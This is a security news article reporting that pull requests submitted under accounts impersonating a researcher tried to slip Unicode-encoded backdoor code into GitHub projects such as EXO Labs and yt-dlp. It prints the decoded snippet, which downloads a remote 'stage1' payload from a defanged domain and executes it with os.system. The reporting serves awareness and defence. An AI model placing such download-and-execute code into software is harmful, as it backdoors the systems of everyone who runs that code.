https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/ BleepingComputer.com logo * * * * [ ] [Login] [Sign up] * * * * [ ] [Login] [Sign up] * News + Featured + Latest + US charges Phobos ransomware admin after South Korea extradition US charges Phobos ransomware admin after South Korea extradition + Chinese hackers exploit Fortinet VPN zero-day to steal credentials Chinese hackers exploit Fortinet VPN zero-day to steal credentials + Phishing emails increasingly use SVG attachments to evade detection Phishing emails increasingly use SVG attachments to evade detection + Critical RCE bug in VMware vCenter Server now exploited in attacks Critical RCE bug in VMware vCenter Server now exploited in attacks + Apple fixes two zero-days used in attacks on Intel-based Macs Apple fixes two zero-days used in attacks on Intel-based Macs + CISA tags Progress Kemp LoadMaster flaw as exploited in attacks CISA tags Progress Kemp LoadMaster flaw as exploited in attacks + Ford investgates alleged breach following customer data leak Ford investgates alleged breach following customer data leak + Oracle warns of Agile PLM file disclosure flaw exploited in attacks Oracle warns of Agile PLM file disclosure flaw exploited in attacks * Tutorials + Latest + Popular + How to access the Dark Web using the Tor Browser How to access the Dark Web using the Tor Browser + How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11 How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11 + How to use the Windows Registry Editor How to use the Windows Registry Editor + How to backup and restore the Windows Registry How to backup and restore the Windows Registry + How to start Windows in Safe Mode How to start Windows in Safe Mode + How to remove a Trojan, Virus, Worm, or other Malware How to remove a Trojan, Virus, Worm, or other Malware + How to show hidden files in Windows 7 How to show hidden files in Windows 7 + How to see hidden files in Windows How to see hidden files in Windows * Virus Removal Guides + Latest + Most Viewed + Ransomware + Remove the Theonlinesearch.com Search Redirect Remove the Theonlinesearch.com Search Redirect + Remove the Smartwebfinder.com Search Redirect Remove the Smartwebfinder.com Search Redirect + How to remove the PBlock+ adware browser extension How to remove the PBlock+ adware browser extension + Remove the Toksearches.xyz Search Redirect Remove the Toksearches.xyz Search Redirect + Remove Security Tool and SecurityTool (Uninstall Guide) Remove Security Tool and SecurityTool (Uninstall Guide) + How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo + How to remove Antivirus 2009 (Uninstall Instructions) How to remove Antivirus 2009 (Uninstall Instructions) + How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller + Locky Ransomware Information, Help Guide, and FAQ Locky Ransomware Information, Help Guide, and FAQ + CryptoLocker Ransomware Information Guide and FAQ CryptoLocker Ransomware Information Guide and FAQ + CryptorBit and HowDecrypt Information Guide and FAQ CryptorBit and HowDecrypt Information Guide and FAQ + CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ * Downloads + Latest + Most Downloaded + Qualys BrowserCheck Qualys BrowserCheck + STOPDecrypter STOPDecrypter + AuroraDecrypter AuroraDecrypter + FilesLockerDecrypter FilesLockerDecrypter + AdwCleaner AdwCleaner + ComboFix ComboFix + RKill RKill + Junkware Removal Tool Junkware Removal Tool * Deals + Categories + eLearning eLearning + IT Certification Courses IT Certification Courses + Gear & Gadgets Gear + Gadgets + Security Security * VPNs + Popular + Best VPNs Best VPNs + How to change IP address How to change IP address + Access the dark web safely Access the dark web safely + Best VPN for YouTube Best VPN for YouTube * Forums * More + Startup Database + Uninstall Database + Glossary + Chat on Discord + Send us a Tip! + Welcome Guide * Home * News * Security * GitHub projects targeted with malicious commits to frame researcher * * GitHub projects targeted with malicious commits to frame researcher By Ax Sharma * November 16, 2024 * 10:30 AM * 1 GitHub GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker's true intentions. 'Innocent looking PR' caught injecting backdoor On Tuesday, Alex Cheema, co-founder of EXO Labs warned everyone of an "innocent looking" code change submitted to EXO's GitHub repository. The pull request titled "clarify mlx requirement for deepseek models" attempted to modify the models.py Python file in the Exo's code base by adding a sequence of numbers to it: Backdoor attempt on @exolabs through an innocent looking PR. Read every line of code. Stay safu. pic.twitter.com/M0WHoCF5Mu -- Alex Cheema - e/acc (@alexocheema) November 12, 2024 These are Unicode numbers, each representing a character. In other words, the plaintext Python code has been converted to its numbers-equivalent form via a simple technique employed by the user submitting the code change. This sequence of characters, "105, 109, 112, 111, 114, 116,..." translates into the following code snippet (URL defanged for safety purposes): import os import urllib import urllib.request x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload") y = x.read() z = y.decode("utf8") x.close() os.system(z) The rather unsophisticated piece of code attempts to connect to evildojo(.)com and, as it appears, download "stage1" payload. Had the code change been approved and merged into EXO's official repository, which it did not, anyone using the product could end up executing code being remotely served by the URL on their system--and hence a functional backdoor implanted. When accessed by BleepingComputer, however, the link returned a 404 (Not Found), and according to several others who tried to access the URL, no content ever existed at the location from the beginning. Who is behind it and why? This is where it gets tricky and there's no conclusive answer in sight. The commit appears to have been submitted from a GitHub user, "evildojo666," an account that has since been deleted. The archived page for the GitHub username and the domain evildojo(.) com point to Mike Bell, a Texas-based security researcher, ethical hacker, and software engineer who has persistently denied that he had anything to do with these commits. Bell claims someone is impersonating him, making these malicious code submissions to smear him. evildojo statement Statement from Mike Bell (X/Twitter) Bell has further stated that "there was never any payload...why do people keep assuming there was?" In all fairness, Bell's story adds up. Anyone can trivially create a GitHub account using another person's details and profile picture, and begin submitting code changes and pull requests to projects -- all under the guise of another person. The non-existent "stage1payload" page on evildojo's domain is another indicator that, since the domain never served any malicious code in the first place, this is likely to be a smear campaign against the owner of the domain, Mike Bell. Another now-deleted GitHub account "darkimage666" was identified by Malcoreio, a malware analysis and reverse engineering platform. This account also impersonated Bell and appeared to engage in this malicious effort to distribute backdoor commits to open source projects. "Not me, an impersonator. Notice account deleted. Very sorry people are being dragged into some skid's beef w/ me," remarked Bell at the imposter account. Multiple projects targeted Social media users, including ChrzanKong, noted that some other projects had been targeted by different GitHub user accounts with similar commits. According to threat intel analyst vx-underground, "yt-dlp," a popular open source audio and video downloader was also targeted. Malcore identified at least 18 instances of identical pull requests directed at other projects. At the time of writing, BleepingComputer observed that many such malicious commits and the associated "muppet" GitHub user accounts, some of which appear to be Indonesia-based, have been taken down. Google engineer and tech events lead, Bogdan Stanga was able to recreate the pull request to test Presubmit's AI Reviewer, which uses GitHub Actions to perform instant code reviews against incoming pull requests to your repository. The test code change was immediately flagged with a "critical security" alert by the reviewer: GitHub Actions blocking malicious PRsPresubmit's AI reviewer catches similar malicious PRs (BleepingComputer) The incident, although caught and squashed early on, has echoes of the notable xz supply chain attack which recently demonstrated how malicious code could be snuck into legitimate and widely popular open source libraries by nefarious actors. Open source project maintainers are urged to carefully scrutinize incoming pull requests, via automated tools and extensive human code reviews, even if these appear to be originating from "good faith" contributors. Related Articles: LottieFiles hacked in supply chain attack to steal users' crypto New CVE-2023-3519 scanner detects hacked Citrix ADC, Gateway devices North Korean hackers use new macOS malware against crypto firms Custom "Pygmy Goat" malware used in Sophos Firewall hack on govt network Windows infected with backdoored Linux VMs in new phishing attacks * Backdoor * GitHub * Open Source * Supply Chain * Supply Chain Attack * * * * * Ax Sharma Ax Sharma is a security researcher and journalist focused on malware analyses and cybercrime investigations. His expertise includes open source software security, threat intel analysis, and reverse engineering. Frequently featured by leading media outlets like the BBC, Channel 5, Fortune, WIRED, among others, Ax is an active community member of the OWASP Foundation and the British Association of Journalists (BAJ). Send any tips via email or Twitter DM. * Previous Article * Next Article Comments * l0de Photo l0de - 3 days ago + + "darkmage" is a well-known scammer and wannabe blackhat hacker on efnet. i would not be surprised to find out there is no "impersonator" Post a Comment Community Rules You need to login in order to post a comment [Login] Not a member yet? Register Now You may also like: [INS::INS] ThreatLocker Popular Stories * Malware Phishing Phishing emails increasingly use SVG attachments to evade detection * T-Mobile T-Mobile confirms it was hacked in recent wave of telecom breaches * WordPress Security plugin flaw in millions of WordPress sites gives admin access Sponsor Posts * Cynet delivers 426% ROI in Forrester Total Economic Impact Study * The Actual Cost of Forgotten Passwords * Solving the painful password problem with better policies * Automate all things security in the Blink of AI * How to leverage $200 million FCC program boosting K-12 cybersecurity Follow us: * * * * * Main Sections * News * VPN Buyer Guides * SysAdmin Software Guides * Downloads * Virus Removal Guides * Tutorials * Startup Database * Uninstall Database * Glossary Community * Forums * Forum Rules * Chat Useful Resources * Welcome Guide * Sitemap Company * About BleepingComputer * Contact Us * Send us a Tip! * Advertising * Write for BleepingComputer * Social & Feeds * Changelog Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure Copyright @ 2003 - 2024 Bleeping Computer^(r) LLC - All Rights Reserved Login Username [ ] Password [ ] [*] Remember Me [ ] Sign in anonymously [Login] Sign in with Twitter button Sign in with Twitter --------------------------------------------------------------------- Not a member yet? Register Now Reporter Help us understand the problem. What is going on with this comment? * ( )Spam * ( )Abusive or Harmful * ( )Inappropriate content * ( )Strong language * ( )Other [ ] * [ ] Read our posting guidelinese to learn what content is prohibited. Submitting... SUBMIT